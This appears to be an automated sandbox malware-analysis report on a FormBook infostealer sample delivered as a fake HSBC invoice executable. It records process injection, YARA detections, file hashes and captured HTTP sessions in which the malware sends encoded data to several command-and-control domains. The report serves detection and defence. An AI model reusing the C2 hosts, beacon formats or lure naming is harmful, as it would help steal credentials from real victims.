                  36192.168.2.1149755104.21.21.230801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:52.365255117 CEST420OUTGET /6xrq/?Qb94=7vWTifjxU&ylT8el=0ZLpfg2H9HntusEXGWgUouKi/jDeWipEcG796wEdKEsBvDcnIDw0UWV/lYuuqMa5oYme4k6lXZ3r5FhP4GItrsCavENJ4moU1CqQcclLTaPymUsAULXTIFQ= HTTP/1.1
                  Host: www.personalcaresale.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:53:53.031018019 CEST651INHTTP/1.1 404 Not Found
                  Date: Wed, 03 Jul 2024 08:53:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  X-Powered-By: PHP/7.4.33
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7%2FAPg60HedazsEu0tfq0EBkBUklhLNHZEJ780Pp9KCObyaD0j61WR%2FDFLW8YUU2Fgk1%2B6EJbsFsvurC6JbEFrGa155G3IPuHGA3s%2BZhWjqRknQV6Wj%2BfSnuc%2FR8MU0nADJ44KWeABjK92Yh"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 89d5a5cce971c339-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.114975674.208.46.171801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:58.072606087 CEST693OUTPOST /6qht/ HTTP/1.1
                  Host: www.lavillitadepapa.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.lavillitadepapa.com
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.lavillitadepapa.com/6qht/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 6a 74 57 72 45 52 56 6f 6e 32 65 53 79 4e 6b 61 64 38 72 47 4e 4d 4b 49 70 67 33 41 2b 6e 52 33 77 72 48 4d 63 65 39 44 75 67 45 33 61 48 6b 49 54 72 78 6c 38 78 4d 30 35 34 68 35 41 69 68 2b 58 45 43 63 69 56 6a 74 73 6f 62 76 67 6b 65 36 30 66 67 42 62 37 36 33 34 5a 52 6f 64 6b 4a 42 36 6d 49 37 51 5a 34 54 52 30 6e 43 4a 47 69 4e 73 71 78 54 71 66 62 47 35 79 6d 72 44 31 4f 76 4e 43 32 7a 76 65 39 62 78 74 68 2f 79 6e 59 77 47 39 51 68 39 31 6e 56 7a 7a 77 4c 2f 4b 42 71 35 52 70 73 4e 4f 77 7a 69 4c 48 63 72 67 71 35 4c 65 78 4a 54 6c 76 61 49 73 77 74 6c 57 4b 61 50 67 3d 3d
                  Data Ascii: ylT8el=jtWrERVon2eSyNkad8rGNMKIpg3A+nR3wrHMce9DugE3aHkITrxl8xM054h5Aih+XECciVjtsobvgke60fgBb7634ZRodkJB6mI7QZ4TR0nCJGiNsqxTqfbG5ymrD1OvNC2zve9bxth/ynYwG9Qh91nVzzwL/KBq5RpsNOwziLHcrgq5LexJTlvaIswtlWKaPg==
                  Jul 3, 2024 10:53:58.601106882 CEST466INHTTP/1.1 301 Moved Permanently
                  Date: Wed, 03 Jul 2024 08:53:58 GMT
                  Server: Apache
                  Location: https://www.lavillitadepapa.com/6qht/
                  Content-Length: 245
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 36 71 68 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/6qht/">here</a>.</p></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.114975774.208.46.171801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:54:00.600840092 CEST713OUTPOST /6qht/ HTTP/1.1
                  Host: www.lavillitadepapa.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.lavillitadepapa.com
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.lavillitadepapa.com/6qht/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 6a 74 57 72 45 52 56 6f 6e 32 65 53 7a 74 55 61 63 66 54 47 64 63 4c 36 6d 41 33 41 72 33 52 72 77 72 44 4d 63 62 64 54 74 53 67 33 61 6d 55 49 51 71 78 6c 77 52 4d 30 68 6f 68 38 64 79 67 54 58 45 47 75 69 58 6e 74 73 6f 50 76 67 6c 75 36 30 4f 67 41 55 4c 36 31 7a 35 52 75 44 55 4a 42 36 6d 49 37 51 5a 73 74 52 30 2f 43 4b 33 53 4e 74 4c 78 4d 6a 2f 62 46 7a 53 6d 72 4a 6c 4f 72 4e 43 33 57 76 65 4e 78 78 72 74 2f 79 6d 6f 77 49 4d 51 67 6b 6c 6e 54 38 54 78 65 37 4a 67 47 7a 57 59 34 55 74 55 64 30 5a 33 63 71 6d 37 6a 62 39 34 65 51 32 6e 59 63 4b 52 64 73 6e 76 54 55 73 71 62 2f 4b 41 76 46 57 54 54 49 44 66 4e 54 4c 58 57 6e 4f 55 3d
                  Data Ascii: ylT8el=jtWrERVon2eSztUacfTGdcL6mA3Ar3RrwrDMcbdTtSg3amUIQqxlwRM0hoh8dygTXEGuiXntsoPvglu60OgAUL61z5RuDUJB6mI7QZstR0/CK3SNtLxMj/bFzSmrJlOrNC3WveNxxrt/ymowIMQgklnT8Txe7JgGzWY4UtUd0Z3cqm7jb94eQ2nYcKRdsnvTUsqb/KAvFWTTIDfNTLXWnOU=
                  Jul 3, 2024 10:54:01.120146990 CEST466INHTTP/1.1 301 Moved Permanently
                  Date: Wed, 03 Jul 2024 08:54:01 GMT
                  Server: Apache
                  Location: https://www.lavillitadepapa.com/6qht/
                  Content-Length: 245
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 36 71 68 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/6qht/">here</a>.</p></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.114975874.208.46.171801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:54:03.133364916 CEST1726OUTPOST /6qht/ HTTP/1.1
                  Host: www.lavillitadepapa.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.lavillitadepapa.com
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.lavillitadepapa.com/6qht/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 6a 74 57 72 45 52 56 6f 6e 32 65 53 7a 74 55 61 63 66 54 47 64 63 4c 36 6d 41 33 41 72 33 52 72 77 72 44 4d 63 62 64 54 74 53 6f 33 61 51 67 49 58 39 46 6c 78 52 4d 30 74 49 68 39 64 79 68 52 58 41 72 6e 69 58 72 39 73 71 33 76 67 44 53 36 6b 73 59 41 50 62 36 31 75 70 52 72 64 6b 4a 51 36 69 73 2f 51 5a 38 74 52 30 2f 43 4b 30 61 4e 37 71 78 4d 6c 2f 62 47 35 79 6d 76 44 31 4f 54 4e 43 66 67 76 61 51 47 78 62 4e 2f 79 47 34 77 4b 2b 6f 67 73 6c 6e 52 77 7a 77 64 37 4a 73 5a 7a 57 73 30 55 74 51 7a 30 62 58 63 71 53 32 73 48 50 34 7a 42 6b 58 57 47 4d 4a 34 77 33 2f 6f 59 50 65 55 30 4a 41 61 47 44 2f 50 4a 69 4b 6c 41 5a 48 78 2b 4c 55 54 2f 68 6b 2b 35 4d 48 52 54 32 2f 37 74 46 4f 70 72 56 53 69 32 7a 30 6e 7a 4e 44 4b 41 2f 36 35 4c 52 75 46 30 72 30 6d 6c 66 55 39 75 71 76 47 36 51 54 65 51 59 6c 6d 72 30 32 74 6f 4f 48 78 65 71 30 30 42 38 54 39 47 67 6a 59 48 6e 62 50 47 78 54 4f 76 59 6c 72 68 6b 46 4d 78 39 4a 6c 4b 4c 52 4e 49 31 74 53 34 2b 50 43 6c 4f 65 54 31 4c 71 [TRUNCATED]
                  Data Ascii: ylT8el=jtWrERVon2eSztUacfTGdcL6mA3Ar3RrwrDMcbdTtSo3aQgIX9FlxRM0tIh9dyhRXArniXr9sq3vgDS6ksYAPb61upRrdkJQ6is/QZ8tR0/CK0aN7qxMl/bG5ymvD1OTNCfgvaQGxbN/yG4wK+ogslnRwzwd7JsZzWs0UtQz0bXcqS2sHP4zBkXWGMJ4w3/oYPeU0JAaGD/PJiKlAZHx+LUT/hk+5MHRT2/7tFOprVSi2z0nzNDKA/65LRuF0r0mlfU9uqvG6QTeQYlmr02toOHxeq00B8T9GgjYHnbPGxTOvYlrhkFMx9JlKLRNI1tS4+PClOeT1LqqOOK0oxQNno5FDRv+GJNyz7O0ajivgyOLP3cSI+n9W2IfFWusJgiJGy4QOJTOvaTrv408WINaPU6g3GZ2lbh9cUl1d7k53p91decSdWP3ZaTGFbBhgu+v1lIQyDu1/VfxgafDzJuifqTEjmeN+QOEKFjbnaSDsOwxdSzVhvS/iPZz0gO5EO6w/v++ghAUW16Qd64j82N/Qg1iPTPzcnJUmXdcmxqPUtbgV9Am59LsHh3JDS1xmbdmnAEtk9cwmmBR2ylzWTy1NFJNx6mmHFZJ9ney60FgvWexSubIVGClHRVkbiQo5IRLHDXeFkuR5HxH6dyJEIlQKS+FaooKI1hh6YBUyXjE3cUUhCAWnXIexEQ3pb3OgY40/gsKA0huuC/ddjTbMGxUQrCufLr5RZ0uNUDqfweCAkJeA3vkD/d1p1Q2f8BZmoW+tbLzSFvldIhkLeot+jbtV6F+TQrlSbhgDkR1QeQjFbqEj7x6iqREv9Wlm7YJ2FOQWaituZOsjmEbRvog9zSzCTaHuzl40j3etpFttKvKRDk2jX6fAJFi2pYgnyrtcD/OQJITMIg4yy86PzUfhCLUSwSA1Au0o4nodAfAba+uhJdVhUCfHhYLACQ1x/O8HdD5vx0+bXN89t8f3NV8OPs2brRPi5N32tqRapC+Wwh5ybpdY [TRUNCATED]
                  Jul 3, 2024 10:54:03.750207901 CEST466INHTTP/1.1 301 Moved Permanently
                  Date: Wed, 03 Jul 2024 08:54:03 GMT
                  Server: Apache
                  Location: https://www.lavillitadepapa.com/6qht/
                  Content-Length: 245
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 36 71 68 74 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/6qht/">here</a>.</p></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  40192.168.2.114975974.208.46.171801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:54:05.666165113 CEST418OUTGET /6qht/?ylT8el=uv+LHhobnH+SyOAbX9GzDMPimlyd0mIqpPmIf9VchnwZRWYaEtRt5W9pqYxhRwpbfDifuk3w05PJo1ySs8BePpe0vNNcbDdG6zcEL5spVXXRDXig7aJejtk=&Qb94=7vWTifjxU HTTP/1.1
                  Host: www.lavillitadepapa.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:54:06.286864996 CEST756INHTTP/1.1 301 Moved Permanently
                  Date: Wed, 03 Jul 2024 08:54:06 GMT
                  Server: Apache
                  Location: https://www.lavillitadepapa.com/6qht/?ylT8el=uv+LHhobnH+SyOAbX9GzDMPimlyd0mIqpPmIf9VchnwZRWYaEtRt5W9pqYxhRwpbfDifuk3w05PJo1ySs8BePpe0vNNcbDdG6zcEL5spVXXRDXig7aJejtk=&Qb94=7vWTifjxU
                  Content-Length: 392
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 61 76 69 6c 6c 69 74 61 64 65 70 61 70 61 2e 63 6f 6d 2f 36 71 68 74 2f 3f 79 6c 54 38 65 6c 3d 75 76 2b 4c 48 68 6f 62 6e 48 2b 53 79 4f 41 62 58 39 47 7a 44 4d 50 69 6d 6c 79 64 30 6d 49 71 70 50 6d 49 66 39 56 63 68 6e 77 5a 52 57 59 61 45 74 52 74 35 57 39 70 71 59 78 68 52 77 70 62 66 44 69 66 75 6b 33 77 30 35 50 4a 6f 31 79 53 73 38 42 65 50 70 65 30 76 4e 4e 63 62 44 64 47 36 7a 63 45 4c 35 73 70 56 58 58 52 44 58 69 67 37 61 4a 65 [TRUNCATED]
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/6qht/?ylT8el=uv+LHhobnH+SyOAbX9GzDMPimlyd0mIqpPmIf9VchnwZRWYaEtRt5W9pqYxhRwpbfDifuk3w05PJo1ySs8BePpe0vNNcbDdG6zcEL5spVXXRDXig7aJejtk=&amp;Qb94=7vWTifjxU">here</a>.</p></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  41192.168.2.1149760118.99.50.8801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:54:14.433928967 CEST409OUTGET /l25n/?Qb94=7vWTifjxU&ylT8el=auppmJM7eN7J/jcd3Cnnc7lcHiLNgr09bdvJbM3sU1/Dmtxph+2FzvX7ZDnD2EcIcX9RCCjXq1LDmMY1SoU+nq8rcMPpo2Cr+tMuRnJbKxq7CEWaX/NqKVE= HTTP/1.1
                  Host: www.zt555.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:54:15.362982035 CEST289INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:54:15 GMT
                  Content-Type: text/html
                  Content-Length: 146
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:04:50:09
                  Start date:03/07/2024
                  Path:C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
                  Imagebase:0xe80000
                  File size:719'872 bytes
                  MD5 hash:15125BD7F04E0129CEEBB7781F7051D2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:2
                  Start time:04:50:10
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
                  Imagebase:0x730000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:true

                  General

                  Target ID:10
                  Start time:04:50:29
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe"
                  Imagebase:0x510000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:11
                  Start time:04:50:30
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                  Imagebase:0x640000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:14
                  Start time:04:50:43
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe"
                  Imagebase:0x510000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:15
                  Start time:04:50:55
                  Start date:03/07/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:0x7ff6de060000
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:4.1%
                    Dynamic/Decrypted Code Coverage:1.5%
                    Signature Coverage:5%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:56
